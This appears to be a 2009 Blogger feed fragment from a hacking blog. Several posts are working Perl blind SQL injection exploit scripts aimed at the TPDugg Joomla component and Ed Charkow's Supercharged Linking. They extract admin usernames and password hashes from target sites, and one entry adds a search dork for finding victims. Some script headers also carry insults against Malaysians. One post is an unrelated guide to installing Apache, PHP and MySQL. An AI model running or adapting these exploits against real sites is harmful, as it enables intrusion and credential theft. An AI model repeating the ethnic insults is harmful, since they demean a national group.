href='http://evilc0de.blogspot.com/2009/09/indexscript-30-sql-injection-vuln.html' title='IndexScript 3.0 SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6117059483743907615</id><published>2009-09-12T08:50:00.004+07:00</published><updated>2009-09-12T09:04:56.707+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>PHP Pro Bid Blind SQL Injection Exploit</title><content type='html'>&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;#                                                                   &lt;br /&gt;# [o] PHP Pro Bid Blind SQL Injection Exploit                       &lt;br /&gt;#                                                                   &lt;br /&gt;#      Software : Professional Auction Script Software by PHP Pro Bid&lt;br /&gt;#      Vendor   : http://www.phpprobid.com/                         &lt;br /&gt;#      Author   : NoGe                                              &lt;br /&gt;#      Contact  : noge[dot]code[at]gmail[dot]com                    &lt;br /&gt;#      Blog     : http://evilc0de.blogspot.com                       &lt;br /&gt;#      Home     : http://antisecurity.org                            &lt;br /&gt;#                                                                   &lt;br /&gt;# [o] Usage                                                         &lt;br /&gt;#                                                                   &lt;br /&gt;#      root@noge:~# perl bid.txt                                    &lt;br /&gt;#                                                                   &lt;br /&gt;#      [x]=======================================[x]                &lt;br /&gt;#       | PHP Pro Bid Blind SQL Injection Exploit |                 &lt;br /&gt;#       |             [F]ound by NoGe             |                 &lt;br /&gt;#      [x]=======================================[x]                &lt;br /&gt;#                                                                   &lt;br /&gt;#      [+] URL Path : www.target.com                                &lt;br /&gt;#      [+] Valid ID : 100015                                        &lt;br /&gt;#                                                                   &lt;br /&gt;#      [!] Exploiting http://www.target.com/ ...                    &lt;br /&gt;#                                                                   &lt;br /&gt;#      [+] SELECT password FROM probid_admin LIMIT 0,1 ...          &lt;br /&gt;#      [+] result&gt; 3a5e10d2fcd005feefbbb38a24f2c51d                 &lt;br /&gt;#                                                                   &lt;br /&gt;#      [!] Exploit completed.                                       &lt;br /&gt;#                                                                   &lt;br /&gt;#      root@noge:~#                                                 &lt;br /&gt;#                                                                   &lt;br /&gt;# [o] Greetz                                                        &lt;br /&gt;#                                                                   &lt;br /&gt;#      Anti Security [ http://antisecurity.org ]                 &lt;br /&gt;#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe          &lt;br /&gt;#      H312Y yooogy mousekill }^-^{ zxvf martfella noname           &lt;br /&gt;#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke s4va               &lt;br /&gt;#                                                                   &lt;br /&gt;# [o] Note                                                          &lt;br /&gt;#                                                                   &lt;br /&gt;#      FUCK MALAYSIA!!!                                             &lt;br /&gt;#      DON'T YOU HAVE YOUR OWN CULTURE?                             &lt;br /&gt;#      AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...       &lt;br /&gt;#                                                                   &lt;br /&gt;&lt;br /&gt;read more follow link below brotha..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://antisecurity.org/php-pro-bid-blind-sql-injection-exploit.antisecurity"&gt;http://antisecurity.org/php-pro-bid-blind-sql-injection-exploit.antisecurity&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;blogspot not allowed open tags. -_-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6117059483743907615?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6117059483743907615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6117059483743907615' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6117059483743907615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6117059483743907615'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/php-pro-bid-blind-sql-injection-exploit.html' title='PHP Pro Bid Blind SQL Injection Exploit'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3421096110702823061</id><published>2009-09-10T01:24:00.004+07:00</published><updated>2009-09-10T01:30:13.380+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Blind SQL Injection Video</title><content type='html'>&lt;pre&gt;&lt;br /&gt;just an simple blind SQL injection video.&lt;br /&gt;&lt;br /&gt;download it here dude..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pacenoge.org/tool/blind.swf"&gt;http://pacenoge.org/tool/blind.swf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;be safe&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3421096110702823061?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3421096110702823061/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3421096110702823061' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3421096110702823061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3421096110702823061'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/blind-sql-injection-video.html' title='Blind SQL Injection Video'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-9177645869993947752</id><published>2009-09-06T18:18:00.004+07:00</published><updated>2009-09-06T18:40:17.515+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>TPDugg Joomla Component 1.1 Blind SQL Injection Exploit</title><content type='html'>&lt;pre&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\&lt;br /&gt;#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////&lt;br /&gt;#&lt;br /&gt;# [o] TPDugg Joomla Component 1.1 Blind SQL Injection Exploit&lt;br /&gt;#&lt;br /&gt;#      Software : com_tpdugg version 1.1&lt;br /&gt;#      Vendor   : http://www.templateplazza.com/&lt;br /&gt;#      Author   : NoGe&lt;br /&gt;#      Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;#      Blog     : http://evilc0de.blogspot.com - http://pacenoge.org&lt;br /&gt;#&lt;br /&gt;# [o] Usage&lt;br /&gt;#&lt;br /&gt;#      root@noge:~# perl tpdugg.pl&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#      [+] URL Path : www.target.com/[path]&lt;br /&gt;#      [+] Valid ID : 1&lt;br /&gt;#      [+] Column   : username&lt;br /&gt;#&lt;br /&gt;#      [!] Exploiting http://www.target.com/[path]/ ...&lt;br /&gt;#&lt;br /&gt;#      [+] SELECT username FROM jos_users LIMIT 0,1 ...&lt;br /&gt;#      [+] jos_users@username&gt; admin&lt;br /&gt;#&lt;br /&gt;#      [!] Exploit completed.&lt;br /&gt;#&lt;br /&gt;# [o] Simple Joomla Password Cracker&lt;br /&gt;#&lt;br /&gt;#      http://pacenoge.org/joomla/&lt;br /&gt;#&lt;br /&gt;# [o] Greetz&lt;br /&gt;#&lt;br /&gt;#      MainHack BrotherHood [ http://mainhack.net ]&lt;br /&gt;#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe&lt;br /&gt;#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella&lt;br /&gt;#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke&lt;br /&gt;#&lt;br /&gt;#                             --=]&gt; COPY MY STYLE BY SAYKOJI &lt;[=--&lt;br /&gt;#&lt;br /&gt;#      FUCK MALAYSIA!!!&lt;br /&gt;#      DON'T YOU HAVE YOUR OWN CULTURE?&lt;br /&gt;#      AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...&lt;br /&gt;#&lt;br /&gt;#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\&lt;br /&gt;#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////  &lt;span class="fullpost"&gt;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;# table  : jos_users&lt;br /&gt;# column : username and password&lt;br /&gt;&lt;br /&gt;$cmsapp = '[-x-]';&lt;br /&gt;$vuln   = 'index.php?option=com_tpdugg&amp;amp;task=tags&amp;amp;id=';&lt;br /&gt;$table  = 'jos_users';&lt;br /&gt;$regexp = 'There are no items';&lt;br /&gt;$maxlen = 65;&lt;br /&gt;&lt;br /&gt;my $OS = "$^O";&lt;br /&gt;if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }&lt;br /&gt;&lt;br /&gt;printf "\n&lt;br /&gt;                        $cmsapp&lt;br /&gt;[x]====================================================[x]&lt;br /&gt;|  Joomla Component com_tpdugg BSQL Injection Exploit  |&lt;br /&gt;|          [F]ound by NoGe [C]oded by Vrs-hCk          |&lt;br /&gt;|               www[dot]pacenoge[dot]org               |&lt;br /&gt;[x]====================================================[x]&lt;br /&gt;&lt;br /&gt;\n";&lt;br /&gt;&lt;br /&gt;print " [+] URL Path : "; chomp($web=&lt;stdin&gt;);&lt;br /&gt;print " [+] Valid ID : "; chomp($id=&lt;stdin&gt;);&lt;br /&gt;print " [+] Column   : "; chomp($columns=&lt;stdin&gt;);&lt;br /&gt;&lt;br /&gt;if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }&lt;br /&gt;&lt;br /&gt;print "\n\n [!] Exploiting $target ...\n\n";&lt;br /&gt;&amp;amp;get_data;&lt;br /&gt;print "\n\n [!] Exploit completed.\n\n";&lt;br /&gt;&lt;br /&gt;sub get_data() {&lt;br /&gt; @columns = split(/,/, $columns);&lt;br /&gt; foreach $column (@columns) {&lt;br /&gt;  print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";&lt;br /&gt;  syswrite(STDOUT, " [+] $table\@$column&gt; ", 255);&lt;br /&gt;  for (my $i=1; $i&lt;=$maxlen; $i++) {    my $chr = 0;    my $found = 0;    my $char = 48;    while (!$chr &amp;amp;&amp;amp; $char&lt;=90) {     if(exploit($i,$char) !~ /$regexp/) {      $chr = 1;      $found = 1;      syswrite(STDOUT,chr($char),1);     } else { $found = 0; }     $char++;    }    if(!$chr) {     $char = 97;     while(!$chr &amp;amp;&amp;amp; $char&lt;=122) {      if(exploit($i,$char) !~ /$regexp/) {       $chr = 1;       $found = 1;       syswrite(STDOUT,chr($char),1);      } else { $found = 0; }      $char++;     }    }    if (!$found) {     print "\n"; last;    }   }  } }  sub exploit() {  my $limit = $_[0];  my $chars = $_[1];  my $blind = '+AND+ASCII(SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1))='.$chars;  my $inject = $target.$vuln.$id.$blind;  my $content = get_content($inject);  return $content; }  sub get_content() {  my $url = $_[0];  my $req = HTTP::Request-&gt;new(GET =&gt; $url);&lt;br /&gt; my $ua  = LWP::UserAgent-&gt;new();&lt;br /&gt; $ua-&gt;timeout(5);&lt;br /&gt; my $res = $ua-&gt;request($req);&lt;br /&gt; if ($res-&gt;is_error){&lt;br /&gt;  print "\n\n [!] Error, ".$res-&gt;status_line.".\n\n";&lt;br /&gt;  exit;&lt;br /&gt; }&lt;br /&gt; return $res-&gt;content;&lt;br /&gt;}&lt;br /&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-9177645869993947752?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/9177645869993947752/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=9177645869993947752' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/9177645869993947752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/9177645869993947752'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/09/tpdugg-joomla-component-11-blind-sql.html' title='TPDugg Joomla Component 1.1 Blind SQL Injection Exploit'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4012145696327826865</id><published>2009-08-22T17:21:00.016+07:00</published><updated>2009-08-22T19:12:27.445+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>how to install Apache, PHP, MySQL and phpMyAdmin on Ubuntu</title><content type='html'>&lt;pre&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Installing Apache&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;open console and execute this command&lt;br /&gt;&lt;br /&gt;$ sudo apt-get install apache2&lt;br /&gt;&lt;br /&gt;when its complete you can check if the Apache is working properly by open this address in your browser to "http://localhost".&lt;br /&gt;if you see the text “It works!”, it means your Apache is working good.&lt;br /&gt;in the end of the installation if you see a message like this&lt;br /&gt;“Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName“.&lt;br /&gt;you can fix that by executing the following command.&lt;br /&gt;&lt;br /&gt;$ gksu gedit /etc/apache2/conf.d/fqdn&lt;br /&gt;&lt;br /&gt;when Gedit opens, type “ServerName localhost” inside the file and click Save then close it.&lt;br /&gt;or your can create fqdn file, edit and copy it into /etc/apache2/conf.d/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Installing php5&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;execute the following command on your console&lt;br /&gt;&lt;br /&gt;$ sudo apt-get install php5 libapache2-mod-php5&lt;br /&gt;&lt;br /&gt;after it complete, you have to restart Apache so that php5 will work on Apache.&lt;br /&gt;run this following command in console to restart Apache&lt;br /&gt;&lt;br /&gt;$ sudo /etc/init.d/apache2 restart&lt;br /&gt;&lt;br /&gt;now you can test to see if php5 works with Apache. To do this you can create a new php file inside your /var/www/ folder.&lt;br /&gt;&lt;br /&gt;$ sudo gedit /var/www/phpinfo.php&lt;br /&gt;&lt;br /&gt;the command above will open Gedit. Just type in the following php code, save and close the file:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/So_PJRIheuI/AAAAAAAAADI/M6yOHPEMOzI/s1600-h/phpinfo.png"&gt;&lt;img style="cursor: pointer; width: 142px; height: 23px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/So_PJRIheuI/AAAAAAAAADI/M6yOHPEMOzI/s320/phpinfo.png" alt="" id="BLOGGER_PHOTO_ID_5372740638601214690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;open this in your browser "http://localhost/phpinfo.php"&lt;br /&gt;and if you can see the phpinfo() and information about your php5 installation it means your have successfully installed php5.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Installing MySQL&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;execute the following command in console&lt;br /&gt;&lt;br /&gt;$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql&lt;br /&gt;&lt;br /&gt;at the end of the installation you will be prompted to set your root or admin password&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_dxtzvQwAPwE/So_INlO7j5I/AAAAAAAAAC4/1ik1p9L1v64/s320/mysql11.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 129px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/So_INlO7j5I/AAAAAAAAAC4/1ik1p9L1v64/s320/mysql11.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;set and confirm your root password for mysql&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Installing phpMyAdmin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;execute the following command in your console&lt;br /&gt;&lt;br /&gt;$ sudo apt-get install phpmyadmin&lt;br /&gt;&lt;br /&gt;during the installation you will be asked to select the webserver that would be used to run phpMyAdmin. Select Apache2&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_dxtzvQwAPwE/So_I2LO6_eI/AAAAAAAAADA/Af6kc_XevHM/s320/phpmyadmin.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 154px;" src="http://4.bp.blogspot.com/_dxtzvQwAPwE/So_I2LO6_eI/AAAAAAAAADA/Af6kc_XevHM/s320/phpmyadmin.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;after the installation is over execute the following command to copy the phpmyadmin folder into the /var/www/ directory.&lt;br /&gt;by default it is installed in /usr/share/phpmyadmin/ directory.&lt;br /&gt;&lt;br /&gt;$ sudo ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin&lt;br /&gt;&lt;br /&gt;now go to the phpMyAdmin login page by open this in your browser "http://localhost/phpmyadmin/index.php"&lt;br /&gt;the username for MySQL and phpMyAdmin is “root”. the password will be what you set in Installing MySQL.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4012145696327826865?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4012145696327826865/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4012145696327826865' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4012145696327826865'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4012145696327826865'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/how-to-install-apache-php-mysql-and.html' title='how to install Apache, PHP, MySQL and phpMyAdmin on Ubuntu'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_dxtzvQwAPwE/So_PJRIheuI/AAAAAAAAADI/M6yOHPEMOzI/s72-c/phpinfo.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8872244296285833124</id><published>2009-08-19T14:59:00.004+07:00</published><updated>2009-08-20T03:08:46.058+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Ed Charkow's Supercharged Linking Blind SQL Injection Exploit</title><content type='html'>&lt;pre&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;#==========================================================================================#&lt;br /&gt;# &lt;br /&gt;# [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit&lt;br /&gt;#      Software   : Ed Charkow's Supercharged Linking&lt;br /&gt;#      Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html &lt;br /&gt;#      Author     : NoGe&lt;br /&gt;#      Contact    : noge[dot]code[at]gmail[dot]com&lt;br /&gt;#      Blog       : http://evilc0de.blogspot.com&lt;br /&gt;#&lt;br /&gt;# [o] Usage&lt;br /&gt;#      root@noge:~# perl link.pl&lt;br /&gt;#&lt;br /&gt;#      [x]============================================================[x]&lt;br /&gt;#       | Ed Charkows Supercharged Linking Blind SQL Injection Exploit |&lt;br /&gt;#       |              [F]ound by NoGe [C]oded by Vrs-hCk              |&lt;br /&gt;#      [x]============================================================[x]&lt;br /&gt;# &lt;br /&gt;#      [+] URL Path : www.target.com/[path]&lt;br /&gt;#      [+] Valid ID : 1&lt;br /&gt;#&lt;br /&gt;#      [!] Exploiting http://www.target.com/[path]/ ...&lt;br /&gt;#&lt;br /&gt;#      [+] SELECT password FROM admin LIMIT 0,1 ...&lt;br /&gt;#      [+] md5@password&gt; de9e3ae793d300ce7ee4742d4513cb06&lt;br /&gt;#&lt;br /&gt;#      [!] Exploit completed.&lt;br /&gt;#&lt;br /&gt;#      root@noge:~#&lt;br /&gt;#&lt;br /&gt;#      crack the hash and login with username admin&lt;br /&gt;#&lt;br /&gt;# [o] Greetz&lt;br /&gt;#      MainHack BrotherHood [ http://mainhack.net ]&lt;br /&gt;#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe&lt;br /&gt;#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella&lt;br /&gt;#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke&lt;br /&gt;#&lt;br /&gt;#==========================================================================================#&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;code&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;$cmsapp = 'crotz';&lt;br /&gt;$vuln   = 'browse.php?id=';&lt;br /&gt;$table  = 'admin';&lt;br /&gt;$column = 'password';&lt;br /&gt;$regexp = "No links for this category could be found";&lt;br /&gt;$maxlen = 32;&lt;br /&gt;&lt;br /&gt;my $OS = "$^O";&lt;br /&gt;if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }&lt;br /&gt;&lt;br /&gt;printf "\n&lt;br /&gt;                           $cmsapp&lt;br /&gt;[x]============================================================[x]&lt;br /&gt;| Ed Charkows Supercharged Linking Blind SQL Injection Exploit |&lt;br /&gt;|              [F]ound by NoGe [C]oded by Vrs-hCk              |&lt;br /&gt;[x]============================================================[x]&lt;br /&gt;&lt;br /&gt;\n";&lt;br /&gt;&lt;br /&gt;print "\n [+] URL Path : "; chomp($web=&lt;stdin&gt;);&lt;br /&gt;print " [+] Valid ID : "; chomp($id=&lt;stdin&gt;);&lt;br /&gt;&lt;br /&gt;if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }&lt;br /&gt;&lt;br /&gt;print "\n\n [!] Exploiting $target ...\n\n";&lt;br /&gt;&amp;amp;get_data;&lt;br /&gt;print "\n\n [!] Exploit completed.\n\n";&lt;br /&gt;&lt;br /&gt;sub get_data() {&lt;br /&gt;print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";&lt;br /&gt;syswrite(STDOUT, " [+] md5\@password&gt; ", 20);&lt;br /&gt;for (my $i=1; $i&lt;=$maxlen; $i++) {   my $chr = 0;   my $found = 0;   my $char = 48;   while (!$chr &amp;amp;&amp;amp; $char&lt;=57) {    if(exploit($i,$char) !~ /$regexp/) {     $chr = 1;     $found = 1;     syswrite(STDOUT,chr($char),1);    } else { $found = 0; }    $char++;   }   if(!$chr) {    $char = 97;    while(!$chr &amp;amp;&amp;amp; $char&lt;=122) {     if(exploit($i,$char) !~ /$regexp/) {      $chr = 1;      $found = 1;      syswrite(STDOUT,chr($char),1);     } else { $found = 0; }     $char++;    }   }   if (!$found) {    print "\n\n [!] Exploit completed.\n\n";    exit;   }  } }  sub exploit() {  my $limit = $_[0];  my $chars = $_[1];  my $blind = '+and+substring((select+'.$column.'+from+'.$table.'+limit+0,1),'.$limit.',1)=char('.$chars.')';  my $inject = $target.$vuln.$id.$blind;  my $content = get_content($inject);  return $content; }  sub get_content() {  my $url = $_[0];  my $req = HTTP::Request-&gt;new(GET =&gt; $url);&lt;br /&gt;my $ua  = LWP::UserAgent-&gt;new();&lt;br /&gt;$ua-&gt;timeout(5);&lt;br /&gt;my $res = $ua-&gt;request($req);&lt;br /&gt;if ($res-&gt;is_error){&lt;br /&gt;print "\n\n [!] Error, ".$res-&gt;status_line.".\n\n";&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;return $res-&gt;content;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/stdin&gt;&lt;/stdin&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8872244296285833124?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8872244296285833124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8872244296285833124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8872244296285833124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8872244296285833124'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/ed-charkows-supercharged-linking-blind.html' title='Ed Charkow&apos;s Supercharged Linking Blind SQL Injection Exploit'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-859011306573639162</id><published>2009-08-17T01:50:00.004+07:00</published><updated>2009-08-20T03:10:33.142+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>AJ Auction Pro OOPD 2.x SQL Injection Exploit</title><content type='html'>&lt;pre&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;#********************************************************#&lt;br /&gt;#&lt;br /&gt;# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit&lt;br /&gt;#      Software : AJ Auction Pro OOPD 2.x&lt;br /&gt;#      Vendor   : http://www.ajsquare.com/&lt;br /&gt;#      Author   : NoGe&lt;br /&gt;#      Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;#      Blog     : http://evilc0de.blogspot.com&lt;br /&gt;#&lt;br /&gt;# [o] Usage&lt;br /&gt;#      root@noge:~# perl ajpro.pl www.target.com&lt;br /&gt;#&lt;br /&gt;# [o] Dork&lt;br /&gt;#      "Powered By AJ Auction Pro"&lt;br /&gt;#&lt;br /&gt;# [o] Greetz&lt;br /&gt;#      MainHack BrotherHood [ http://mainhack.net ]&lt;br /&gt;#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe&lt;br /&gt;#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella&lt;br /&gt;#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke&lt;br /&gt;# &lt;br /&gt;#********************************************************#&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;my $target = $ARGV[0];&lt;br 